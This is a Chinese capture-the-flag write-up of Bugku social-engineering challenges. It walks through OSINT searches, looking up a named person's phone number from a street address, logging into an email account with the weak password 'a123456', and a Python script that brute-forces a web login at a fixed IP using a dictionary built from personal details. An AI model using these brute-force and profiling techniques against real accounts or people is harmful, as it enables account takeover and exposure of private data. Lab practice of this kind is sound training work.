Bugku社工题writeup
密码
名字首字母小写+生日就是密码,格式KEY{}就是flag
信息查找
Google搜索:bugku.cn 今日头条
简单个人信息收集
下载是个伪加密的zip
在哈尔滨市阿城区胜利街六委十三组 有个叫杜甫的你能把他的手机号找到吗?
flag格式 flag{手机号}
社工得到flag
社工进阶
搜索孤长离
发现一个贴吧,可以看到有个邮箱地址

根据提示弱口令,登陆邮箱找到flag(密码:a123456)
简单社工尝试
Google识图一下


点进来然后看到有个微博


访问图片中的url得到flag

王晓明的日记
注意提示:多用bugku在线工具
应该是这玩儿意↓

用提供的信息生成字典


python爆破脚本如下↓
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
| import requests,re
def req(pwd): url='http://120.24.86.145:8002/xiaoming/?yes' s = requests.session() r = s.get(url) r.encoding = 'utf-8' response = s.post(url,data={'pwd':pwd}) response.encoding = 'utf-8' b = re.findall(r'密码不正确,请重新输入', response.text) return b
def zidian(): f = open('mima.txt','r',encoding='UTF-8') a = f.read() a = a.splitlines() return a
a = zidian() for pwd in a: b = req(pwd) try: if b[0] == '密码不正确,请重新输入': pass except: print(pwd) break
|